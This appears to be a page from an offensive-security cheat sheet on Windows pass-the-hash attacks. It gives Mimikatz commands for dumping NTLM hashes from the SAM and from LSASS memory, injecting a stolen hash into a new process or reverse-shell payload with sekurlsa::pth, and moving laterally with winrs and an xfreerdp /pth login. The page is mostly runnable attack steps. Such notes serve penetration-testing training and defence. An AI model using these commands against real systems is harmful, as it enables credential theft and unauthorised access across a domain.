Skip to main content

Pass The Hash

Required Privileges: Administrators

The NTLM Challenge sent during Authentication can be responded to just by knowing the Password Hash. This means we can Authenticate without requiring the plaintext password to be known.

Instead of having to crack NTLM Hashes, if the Windows Domain is configured to use NTLM Authentication, we can Pass-the-Hash (PTH) and Authenticate Successfully.


SAM

This method will only get Hashes from Local Users on the machine. No Domain User's hashes will be available.
:: Extracting NTLM Hashes from Local SAM
privilege::debug
token::elevate

LSASS

This method will extract any NTLM Hashes for Local Users and any Domain User that has recently Logged onto the Machine.
:: Extracting NTLM Hashes from LSASS Memory
privilege::debug
token::elevate
sekurlsa::msv

Using The Hashes

We can use the Extracted Hashes to perform a Pass-the-Hash Attack by using Mimikatz to Inject an Access Token for the Victim User on a Reverse Shell or any other Command.

If we run the whoami Command on this Shell, it will still show us the Original User before doing PTH, but any Command run from here will actually use the Credentials Injected using PTH.

:: Reverts the Previous Token
token::revert

:: Pass-the-Hash
sekurlsa::pth /user:USER /domain:TARGET /ntlm:HASH /run:"Command/PAYLOAD To Run"

:: Command Example
/run:"cmd.exe"

Once we have a Command Prompt with the Credentials Loaded we can use winrs to connect to another TARGET on the Domain since the Credentials are Injected into our Session.

:: The [Username - Password] Fields are not Necessary because the Credentials are already Injected
winrs.exe -r:TARGET cmd

Other Ways of Connecting

We can use these Tools to connect to the Target.

xfreerdp /v:TARGET /u:DOMAIN\\USERNAME /pth:NTLM_HASH